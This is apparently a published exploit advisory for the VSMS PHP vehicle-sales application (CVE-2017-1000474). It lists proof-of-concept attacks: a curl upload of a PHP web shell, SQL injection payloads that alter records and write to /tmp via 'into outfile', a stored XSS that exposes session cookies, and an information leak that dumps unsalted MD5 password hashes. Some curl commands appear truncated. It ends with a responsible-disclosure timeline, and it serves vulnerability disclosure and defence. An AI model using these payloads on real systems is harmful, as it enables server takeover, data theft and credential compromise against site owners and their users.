# Exploit Title: VSMS Multiple Vulnerabilities # Google Dork: N/A # Date: 16-3-2018 # Exploit Author: Sing # Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typ_redirect # Software Link: https://sourceforge.net/projects/vsms-php/?source=typ_redirect # Version: 07/2017 (possible v1.2) # Tested on: CentOS 6.9 # CVE : CVE-2017-1000474 1 login/vehicles.php: Lack of file type filter enabling attacker to upload PHP scripts that can later be executed POC curl -i -b 'PHPSESSID=58csdp0as3lvqapqjesp67tr05' -F 'submit=submit' -F support_images[]=@./getShell.php The malicious PHP file has been uploaded to /var/www/html/soyket-vsms-php-63b563b/login/uploads. Now, browse to the location and note the file name. In my vase it's 1510529218getShell.php. To execute it do curl 2 login/profile.php: Found SQLI in the Date of Birth text box. POC Paste the below POC into the birth date text box and update. A mysql version will appear in the Position box 2015-11-30',u_position=@@version,u_type='Employee' WHERE u_email='employee@employee.com';-- - 3 login/Actions.php: Found Stored XSS in manufacturer_name POC curl -d 'manufacturer_name=' Now when user's browse to login/model.php page, he/she will see an alert with the session cookie 4 login/Actions.php (Multiple vulnerabilities) POC (SQLI) curl -d "username=employee@employee.com' union select 'SQLIIII' into outfile'/tmp/stuff.txt" This SQLI will write SQLIIII to /tmp/stuff.txt. POC (Information Leak curl This gives anonymous user full list of the users table with unsalted MD5 hash passwords. 5. Solution: The author notified of a new version with fixes (possibly v1.3). It can be found at vendoras home page https://sourceforge.net/projects/vsms-php/?source=typ_redirect Time Line Author was notified of the vulnerabilities on 27-01-2018 Author notified of the new updates on 14-03-2018 Exploit released on 16-03-2018